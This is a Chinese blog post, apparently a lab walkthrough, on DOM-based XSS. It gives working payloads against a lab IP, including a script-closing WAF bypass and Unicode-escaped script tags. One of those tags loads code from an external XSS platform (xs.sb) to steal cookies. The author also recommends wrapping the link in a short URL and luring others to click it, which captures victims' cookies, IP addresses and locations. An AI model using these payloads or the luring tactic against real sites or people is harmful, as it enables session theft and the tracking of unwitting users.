DOM型XSS

最新推荐文章于 2024-10-10 14:58:35 发布
最新推荐文章于 2024-10-10 14:58:35 发布
阅读量4.2k 收藏 12
点赞数 1
分类专栏: 笔记 文章标签: js xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45300786/article/details/108096465
版权

在这里插入图片描述
可以通过document来获取有些信息。
在这里插入图片描述

而我们XSS插入的话,一般是动态页面,但是有些是静态页面,不会和数据库发生交互,这就大大提高了安全性,我们就很难XSS了,而考虑到这一点,很多开发也把动态页面假装弄成静态页面,

这种页面称为:伪静态页面

那我们怎么区分动态和伪静态页面呢?

很简单我们可以利用一个js代码来判断是否为动态页面。
我们在控制台输入document.lastModified
如果时间一直是新的,那么就是动态或者伪静态,如果时间一直不变,那么就是静态,没什么好插的了。
在这里插入图片描述

再介绍一个函数,回显上一个地址的urldocument.referrer

在这里插入图片描述

回显标题document.title

在这里插入图片描述

其他的可以自己去试试

在这里插入图片描述

尝试1

在这里插入图片描述
在这里插入图片描述

尝试2

在这里插入图片描述

没有使用unescape函数

在这里插入图片描述

在真实的环境中,一般document会URL解码(unescape)一次。

a.com/135.html?id=<script>alert(1)</script>

document.write(unescape(document.URL));

在这里插入图片描述

unescape函数对url解码,让js代码成功执行弹窗。

在这里插入图片描述

因为JS触发的XSS就是DOM型XSS,而一般而言dom型的XSS都是反射性,很少有存储型。

document.write() 输出内容。

输出name前面字符的长度为20

在这里插入图片描述

通过一段js代码进行跳转,并不会与后端进行交互。

例子
在这里插入图片描述

这里说的锚点是快速跳转到某个位置。

在这里插入图片描述

了解了这么多后,我们来实战一下

我们可以打开控制台看一下,源码,发现有document,也就是js代码,我们试着传参写入,发现第二个位置成功输出。
在这里插入图片描述
然后我们直接XSS代码插入,发现被waf拦截。
在这里插入图片描述
那我们想一下waf的特性,只会过滤一些特殊的东西。比如XSS代码
那我先写正常的,在写我们的XSS代码。
可以看到我们写的js代码生效了,但是不是我们真正想要的结果。
我们看下源码。http://59.63.200.79:8014/dom_xss/index.php/1.txt?id=<script>alert(1111111)</script>
在这里插入图片描述
发现我们是在JS代码里面,那我们把前面那个script闭合就可以了
在这里插入图片描述
输入index.php/1.txt?id=</script><script>alert(1)</script>进行绕过和闭合,然后在插入XSS代码。
http://59.63.200.79:8014/dom_xss/index.php/1.txt?id=</script><script>alert(1)</script>在这里插入图片描述

上面一种是针对waf绕过再来XSS插入的一种方法。

接下来我们不针对waf,来针对document来XSS代码插入。
document支持native编码,那我们可以把我们的XSS代码进行转码,转成native再来XSS代码插入。
在这里插入图片描述

输入http://59.63.200.79:8014/dom_xss/?\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0031\u0031\u0031\u0031\u0031\u0031\u0029\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e直接绕过

在这里插入图片描述
既然已经成功执行了,那我们现在来执行我们想要的信息

先创建一个XSS平台任务。xs.sb

在这里插入图片描述
把这个代码复制下来。
在这里插入图片描述
然后转码成native编码
在这里插入图片描述
输入http://59.63.200.79:8014/dom_xss/?\u003c\u0073\u0043\u0052\u0069\u0050\u0074\u0020\u0073\u0052\u0043\u003d\u002f\u002f\u0078\u0073\u002e\u0073\u0062\u002f\u0038\u0035\u0073\u006a\u003e\u003c\u002f\u0073\u0043\u0072\u0049\u0070\u0054\u003e
或者(这里的1.txt是为了绕过waf,但是1.txt不存在,就去读index.php的内容)http://59.63.200.79:8014/dom_xss/index.php/1.txt?\u003c\u0073\u0043\u0052\u0069\u0050\u0074\u0020\u0073\u0052\u0043\u003d\u002f\u002f\u0078\u0073\u002e\u0073\u0062\u002f\u0075\u0053\u0049\u0047\u003e\u003c\u002f\u0073\u0043\u0072\u0049\u0070\u0054\u003e

然后查看XSS平台里的任务窃取到的cookie

注意:一个ip访问这个链接后,xss平台只能获取一次,就算这个ip刷新这个链接,xss也不会再获取到cookie了,不知道这个是xss平台的原因还是啥的,所以还想获取cookie的话,那就只有换ip了

在这里插入图片描述

判断XSS代码是否执行,除了看XSS平台接受到信息没,还可以看控制台的网络,是否访问了XSS平台
在这里插入图片描述

遇到反射性的XSS,可以以下办法。

通过把我们的链接转成短链接,然后诱导别人点击,从而达到目的

这里我发现一个比较好玩的东西,就是通过这个靶场,然后做成短链接,让别人访问的话,除可以获取到靶场的cookie之外,还可以获取到访问人的地址和ip!!!!!!!!!!!!!

短链接http://tool.chinaz.com/tools/dwz.aspx?qq-pf-to=pcqq.group

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

樱浅沐冰
关注
专栏目录
反射/存储/DOMXSS攻击原理及攻击流程详解
G3et的博客
01-02 2075
XSS(跨站脚本攻击)是一种常见的 Web 安全漏洞,其允许攻击者在恶意用户的浏览器中执行脚本。这可能导致数据泄露、控制用户浏览器或执行其他恶意操作。 XSS 攻击通常利用网页的客户端代码(通常是 HTML 或 JavaScript)来执行。攻击者可能会向网页中插入恶意的 HTML 元素或 JavaScript 代码,试图欺骗浏览器执行攻击者的脚本。
DOMXSS:攻击原理和实例解析
NsbiCs的博客
10-10 1065
DOMXSS(Document Object Model Cross-Site Scripting)是一种常见的跨站脚本攻击技术,它利用浏览器中的DOM(Document Object Model)来执行恶意脚本,从而导致安全漏洞。DOMXSS是一种常见的跨站脚本攻击技术,攻击者通过注入恶意脚本到目标网页的DOM中,利用浏览器的解析执行特性来实现攻击目的。以上演示代码展示了不同的DOMXSS攻击场景,包括恶意脚本注入到URL参数中、利用innerHTML属性注入恶意脚本以及修改事件处理函数实现攻击。
【DVWA-master】xss(DOM)(详)
最新发布
Mw18211406853的博客
10-10 927
查看源代码,会发现会含有<script的代码会出现报错,直接统一返回English,按F12查看页面的html,查看select那部分就是提交的那部分default+8,+8刚好就是等号的后面,代码会把等号后面的东西转给option,进行一系列操作,所以可以在option那里插入我们的代码,要避开被过滤可以把前面的闭合,把代码放在后面,就可以执行恶意代码了,可以看到把select和option闭合就可以了,但是不能用<script>标签了,可以用img或body标签。这里利用#的机制,绕过后台的过滤。
xssDOM
xu_1234567的博客
11-04 6659
1.DOMxss原理 dom就是一个树状的模,你可以编写Javascript代码根据dom一层一层的节点,去遍历/获取/修改对应的节点,对象,值。了解了这么一个知识点,你就会发现,其实dom xss并不复杂,他也属于反射xss的一种(domxss取决于输出位置,并不取决于输出环境,因此domxss既有可能是反射的,也有可能是存储的),简单去理解就是因为他输出点在DOMdom - xss是通过url传入参数去控制触发的)分析完dom-xss之后,再说说存储xss,其实也很好理解,存储xss
web ---- DomXSS
L0g1c的博客
07-31 2610
存储xss最持久,而且更为隐蔽,因为是存在数据库当中的,触发的url当中没有带js或者其他的html代码,所以他的实用性更高。其次则是DomXSS因为它能绕过大部分浏览器的过滤,再其次才是反射XSS反射xss还要深思熟虑的考虑根据浏览器去bypass各种过滤,易用性稍微差一些(注意反射xssdomxss都需要在url加入js代码才能够触发)非持久xss攻击要求用户访问一个被攻击者篡改后的链接,用户访问该链接时,被植入的攻击脚本被用户游览器执行,从而达到攻击目的。...
网络安全 - Web 安全攻防 - DOM XSS 实验包 - DOMBasedXSSLab.zip
09-22
**DOMBasedXSSLab.zip** 是一个专注于 Web 安全攻防技术,特别是 DOM XSS(跨站脚本攻击)的实验包。DOM XSS 是一种发生在客户端的脚本安全漏洞,攻击者通过操纵 Web 页面的 DOM 来插入恶意脚本,从而在用户的...
DOMXSS1
08-08
DOMXSS DOMXSS(Document Object Model-based Cross-Site Scripting)是指攻击者通过inject恶意脚本到网页中,从而影响用户的隐私和安全的一种攻击方式。下面是对DOMXSS的详细解释和分析: 什么是DOMXSS?...
Web应用安全:DOMXSS.pptx
06-18
**DOMXSS简介** DOMXSS,全称为Document Object Model Cross-Site Scripting,是一种特殊的跨站脚本漏洞,其根源在于网页的动态内容是通过JavaScript对DOM树进行操作来呈现的。DOM是一个标准,由W3C定义,用于...
Web应用安全:DOMXSS习题(实验习题).docx
06-17
### Web应用安全:深入解析DOMXSS及其攻击原理 #### DOMXSS概述 **DOMXSS**(Document Object Model Cross-Site Scripting),是跨站脚本攻击(Cross-Site Scripting, XSS)的一种类。与反射XSS和存储...
DOM XSS 攻击演示(附链接)
Flag少侠的博客
01-25 3868
DOM XSS 攻击演示(附链接)
DOMXSS详讲
weixin_59047731的博客
11-21 2747
在网站页面中有许多元素,当页面到达浏览器时,浏览器会为页面创建一个项级的Document object文档对象,接着生成各个子文档对象,每个页面元素对应一个文档对象,每个文档对象包含属性、方法和事件。也就是说,客户端的脚本程序可以通过DOM动态修改页面内容,从客户端获取DOM中的数据并在本地执行。由于DOM是在客户端修改节点的,所以基于DOMXSS漏洞不需要与服务器端交互,它只发生在客户端处理数据的阶段。除了富文本的输出之外,在变量输出到HTML页面时,可以使用编码或者转义的方式来防御XSS攻击。
DomXSS
chenxunyang0492的博客
01-02 319
可能触发DOMXSS的属性: document.referer属性 window.name属性 location属性 innerHTML属性 documen.write属性 ...
3-4DomXSS详解以及演示
山兔的博客
04-21 3592
学习DOMXSS前,先搞清楚什么是DOM 通过 JavaScript,可以重构整个 HTML 文档。您可以添加、移除、改变或重排页面上的项目。 要改变页面的某个东西,JavaScript 就需要获得对HTML 文档中所有元素进行访问的入口。这个入口,连同对 HTML 元素进行添加、移动、改变或移除的方法和属性,都是通过文档对象模来获得的(DOM)。 所以,你可以把DOM理解为一个可以访问HTML的标准编程接口。 举个栗子来理解一下DOM <html><head> <sc
DOM XSS
chjunjun的博客
11-04 360
0x01.是什么?? DOM XSS 本质上是一种不涉及服务端的纯前端漏洞,通过浏览器端解析造成攻击。在浏览器端解析修改DOM树,由于前端代码在浏览器相当于‘公开’的,DOM XSS这类漏洞容易被分析发现。而且DOM XSS 重要的优势是它可以绕过waf 0x02.DOM XSS 有哪些场景? 一般的攻击方法是:攻击者构造一个URL,诱发用户点击,用户点击后,URL可以利用DOM X...
六、前端XSS——(3)DOMXSS
weixin_45540609的博客
04-25 1020
一、DOMXSS DOM(Document Object Model)是一个树形模,可以编写JavaScript代码根据dom一层一层的节点,去遍历/获取/修改对应的节点、对象、值。DOM是一个JS可以操纵浏览器和网页显示内容的接口。 每个载入浏览器的HTML文档都会成为Documnet对象,Document对象使我们可以从脚本中队HTML页面中的所有元素进行访问 lastModified可以判断伪静态。 做domXSS一定要审计。 1.html ...
第十五天DOMxss和编码绕过问题
代码审计
03-21 1999
DOMxss 对象模(Document Object Model),即大名鼎鼎的DOMDOM可以被认为是一种通过将页面元素以对象的树形方式表现,以便由Javascript组织处理的实现方法。 特点2 无需服务器参与 为什么右键查看源代码 无法找到插入的payload 源代码 来源于服务器的返回 而domxss无需服务器的参与 所以此时无法修改右键查看的源代码 DOM XSS与反射XSS和存储XSS的差别是在于DOM XSS的代码不需要服务器解析响应的直接参与,触发XSS漏洞靠
DOMXSS漏洞测试payload大全
DOMXSSXSS漏洞的一种类,它涉及到网页的Document Object Model(DOM)。DOM是一个编程接口,用于HTML和XML文档,允许程序和脚本动态更新、添加和删除页面内容。DOMXSS漏洞通常出现在网页动态生成内容时,不...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值